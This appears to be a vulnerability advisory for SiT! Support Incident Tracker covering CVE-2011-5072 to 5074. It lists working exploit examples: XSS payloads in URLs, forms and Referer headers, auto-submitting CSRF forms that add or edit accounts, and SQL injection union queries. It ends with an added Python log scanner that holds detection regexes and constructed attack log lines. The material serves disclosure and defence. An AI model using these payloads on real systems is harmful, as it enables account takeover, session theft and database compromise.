High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in SiT! Support Incident Tracker, which can be exploited to perform cross-site scripting, cross-site request forgery and SQL injection attacks.
1) Cross-site scripting (XSS) vulnerabilities in SiT! Support Incident Tracker: CVE-2011-5073

1.1 The vulnerability exists due to an input sanitization error in the "table1" HTTP POST parameter in report_customers.php, report_incidents_by_engineer.php, report_incidents_by_site.php and report_marketing.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.

Exploitation examples:

1.
<form action="http://[host]/report_customers.php" method="post">
<input type="hidden" name="table1" value="'><script>alert(document.cookie);</script>">
<input type="submit" value="exploit">
</form>

2.
<form action="http://[host]/report_incidents_by_engineer.php" method="post">
<input type="hidden" name="table1" value="'><script>alert(document.cookie);</script>">
<input type="submit" value="exploit">
</form>

3.
<form action="http://[host]/report_incidents_by_site.php" method="post">
<input type="hidden" name="table1" value="'><script>alert(document.cookie);</script>">
<input type="submit" value="exploit">
</form>

4.
<form action="http://[host]/report_marketing.php" method="post">
<input type="hidden" name="table1" value="'><script>alert(document.cookie);</script>">
<input type="submit" value="exploit">
</form>

1.2 The vulnerability exists due to an input sanitization error in the "startdate" and "enddate" parameters in report_incidents_by_vendor.php (when "mode" is set). A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.
Exploitation example:

http://[host]/report_incidents_by_vendor.php?mode=1&startdate=%3Cscript%3Ealert%281%29;%3C/script%3E&enddate=%3Cscript%3Ealert%282%29;%3C/script%3E

1.3 The vulnerability exists due to an input sanitization error in the HTTP Referer header in billable_incidents.php (when "mode" is set to "approvalpage" and "output" is set to "html"), transactions.php (when "display" is set to "html") and forgotpwd.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.

Exploitation examples:

1.
GET /billable_incidents.php?mode=approvalpage&output=html HTTP/1.1
Referer: '><script>alert(document.cookie);</script>

2.
GET /transactions.php?display=html HTTP/1.1
Referer: '><script>alert(document.cookie);</script>

3.
GET /forgotpwd.php?userid=1&action=sendpwd HTTP/1.1
Referer: '<script>alert(document.cookie);</script>

1.4 The vulnerability exists due to an input sanitization error in the "mode" parameter in contact_support.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.

Exploitation example:

http://[host]/contact_support.php?mode=1%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.5 The vulnerability exists due to an input sanitization error in the "contractid" parameter in contract_add_service.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.

Exploitation example:

http://[host]/contract_add_service.php?contractid=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.6 The vulnerability exists due to an input sanitization error in the "user" parameter in edit_backup_users.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.

Exploitation example:

http://[host]/edit_backup_users.php?user=%27%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.7 The vulnerability exists due to an input sanitization error in the "id" parameter in edit_escalation_path.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.

Exploitation example:

http://[host]/edit_escalation_path.php?id=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.8 The vulnerability exists due to an input sanitization error in the "action" parameter in inbox.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.

Exploitation example:

http://[host]/inbox.php?action=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.9 The vulnerability exists due to an input sanitization error in the "search_string" parameter in incident_add.php (when "action" is set to "findcontact"). A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.

Exploitation example:

http://[host]/incident_add.php?action=findcontact&search_string=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
2) Cross-site request forgery (CSRF) in SiT! Support Incident Tracker: CVE-2011-5074

The vulnerability exists due to insufficient validation of the request origin in user_profile_edit.php and user_add.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link, and create or modify arbitrary accounts within the application.

Exploitation examples:

<form action="http://[host]/user_profile_edit.php" method="post">
<input type="hidden" name="realname" value="realname">
<input type="hidden" name="mode" value="save">
<input type="hidden" name="submit" value="Save">
<input type="hidden" name="email" value="testemail@test.com">
<input type="hidden" name="userid" value="1">
<input type="submit" id="btn">
</form>
<script>
document.getElementById('btn').click();
</script>

<form action="http://[host]/user_add.php" method="post">
<input type="hidden" name="realname" value="testuser">
<input type="hidden" name="username" value="testuser">
<input type="hidden" name="password" value="password">
<input type="hidden" name="groupid" value="0">
<input type="hidden" name="roleid" value="1">
<input type="hidden" name="jobtitle" value="jobtitle">
<input type="hidden" name="email" value="email@email.com">
<input type="hidden" name="submit" value="Add User">
<input type="submit" id="btn">
</form>
<script>
document.getElementById('btn').click();
</script>
3) SQL injection vulnerabilities in SiT! Support Incident Tracker: CVE-2011-5072

3.1 The vulnerability exists due to input sanitization errors in the "start" parameter in portal/kb.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in the application's database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.

Exploitation example:

http://[host]/portal/kb.php?start=SQL_CODE_HERE

3.2 The vulnerability exists due to input sanitization errors in the "contractid" parameter in contract_add_service.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in the application's database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.

Exploitation example:

http://[host]/contract_add_service.php?contractid=1%20union%20%28select%20min%28@a:=1%29from%20%28select%201%20union%20select%202%29k%20group%20by%20%28select%20concat%28@@version,0x0,@a:=%28@a%2B1%29%2%29%29%29%20+--+

3.3 The vulnerability exists due to input sanitization errors in the "id" parameter in edit_escalation_path.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in the application's database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.

Exploitation example:

http://[host]/edit_escalation_path.php?id=-1%20union%20select%201,version%28%29,user%28%29,4,5,6,7,8,9

3.4 The vulnerability exists due to input sanitization errors in the "unlock" and "lock" parameters in holding_queue.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in the application's database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.

Exploitation examples:

http://[host]/holding_queue.php?unlock=%27SQL_CODE_HERE
http://[host]/holding_queue.php?lock=%27SQL_CODE_HERE

3.5 The vulnerability exists due to input sanitization errors in the "selected" parameter in holding_queue.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary SQL commands in the application's database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.

Exploitation example:

<form action="http://[host]/holding_queue.php" method="post">
<input type="hidden" name="selected[]" value="'SQL_CODE_HERE">
<input type="submit" value="exploit">
</form>

3.6 The vulnerability exists due to input sanitization errors in the "inc" parameter in report_customers.php (when "mode" is set to "report") and report_incidents_by_site.php (when "mode" is set to "report"). A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in the application's database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.

Exploitation examples:

<form action="http://[host]/report_customers.php?mode=report" method="post">
<input type="hidden" name="inc[]" value="-1) union select 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 -- ">
<input type="hidden" name="output" value="screen">
<input type="submit" value="exploit">
</form>

<form action="http://[host]/report_incidents_by_site.php?mode=report" method="post">
<input type="hidden" name="inc[]" value="-1) union select version(),2,3,4,5,6,7,8,9,10 -- ">
<input type="hidden" name="output" value="screen">
<input type="submit" value="exploit">
</form>

3.7 The vulnerability exists due to input sanitization errors in the "start" parameter in search.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in the application's database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.

Exploitation example:

http://[host]/search.php?q=123&domain=incidents&start=SQL_CODE_HERE

3.8 The vulnerability exists due to input sanitization errors in the "sites" parameter in transactions.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in the application's database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.

Exploitation example:

http://[host]/transactions.php?sites[]=1%20union%20select%201,2,3,4,5,6,7,8,version%28%29,10,11,12,13,14,15,16%20+--+
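As an added defensive example that is not part of the original advisory, the following Python scans web-server access logs for requests shaped like the query-string XSS/SQL injection cases, the Referer-header XSS cases and the CSRF targets listed above (sections 1 to 3). The log format (Apache/nginx "combined"), the site host name and the sample log lines are assumptions constructed for the example; POST-body parameters such as "table1", "inc[]" and "selected[]" are not visible in access logs and so are not covered.

```python
import re
from urllib.parse import parse_qs, urlsplit, unquote

# Query-string sinks named in the advisory (POST-body parameters such as
# table1, inc[] and selected[] never reach an access log, so are omitted).
WATCHED = {
    "/contact_support.php": {"mode"}, "/contract_add_service.php": {"contractid"},
    "/edit_backup_users.php": {"user"}, "/edit_escalation_path.php": {"id"},
    "/inbox.php": {"action"}, "/incident_add.php": {"search_string"},
    "/report_incidents_by_vendor.php": {"startdate", "enddate"},
    "/portal/kb.php": {"start"}, "/search.php": {"start"},
    "/holding_queue.php": {"lock", "unlock"}, "/transactions.php": {"sites[]"},
}
REFERER_XSS = {"/billable_incidents.php", "/transactions.php", "/forgotpwd.php"}
CSRF_TARGETS = {"/user_add.php", "/user_profile_edit.php"}
XSS_RE = re.compile(r"<\s*/?\s*script|javascript:|\bon[a-z]+\s*=", re.I)
SQLI_RE = re.compile(r"\bunion\b[\s\S]{0,40}\bselect\b|@@version|\bversion\s*\(|--\s*$", re.I)
# Apache/nginx "combined" format (assumed); the second quoted field is the Referer.
LOG_RE = re.compile(r'^\S+ \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
                    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"$')

def analyse(line, site_host="sit.example.org"):  # site_host is an assumed value
    m = LOG_RE.match(line)
    if not m:
        return []
    url, findings = urlsplit(m["target"]), []
    sinks = WATCHED.get(url.path, ())
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        for value in values:  # parse_qs has already percent-decoded the value
            if name in sinks and XSS_RE.search(value):
                findings.append(("xss", url.path, name))
            if name in sinks and SQLI_RE.search(value):
                findings.append(("sqli", url.path, name))
    referer = m["referer"]
    if url.path in REFERER_XSS and XSS_RE.search(unquote(referer)):
        findings.append(("referer-xss", url.path, "Referer"))
    # A state-changing POST with an off-site or absent Referer is the shape a
    # CSRF lure produces; an absent Referer alone is lower-confidence evidence.
    if m["method"] == "POST" and url.path in CSRF_TARGETS \
            and urlsplit(referer).netloc.lower() != site_host:
        findings.append(("csrf-suspect", url.path, "Referer"))
    return findings

# Constructed sample lines (not real traffic): one per rule, then one benign.
SAMPLE_LOG = """\
198.51.100.7 - - [12/Dec/2011:10:00:01 +0000] "GET /contact_support.php?mode=1%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Dec/2011:10:00:02 +0000] "GET /edit_escalation_path.php?id=-1%20union%20select%201,version() HTTP/1.1" 200 733 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Dec/2011:10:00:03 +0000] "GET /forgotpwd.php?userid=1&action=sendpwd HTTP/1.1" 200 300 "'<script>alert(1)</script>" "Mozilla/5.0"
192.0.2.20 - - [12/Dec/2011:10:00:04 +0000] "POST /user_add.php HTTP/1.1" 302 0 "http://lure.example/page.html" "Mozilla/5.0"
192.0.2.21 - - [12/Dec/2011:10:00:05 +0000] "GET /inbox.php?action=list HTTP/1.1" 200 100 "http://sit.example.org/main.php" "Mozilla/5.0"
"""
```

Run `analyse` over each line of a real log to get (kind, path, parameter) findings; the regexes are deliberately narrow to the payload shapes in this advisory and should be widened for general use.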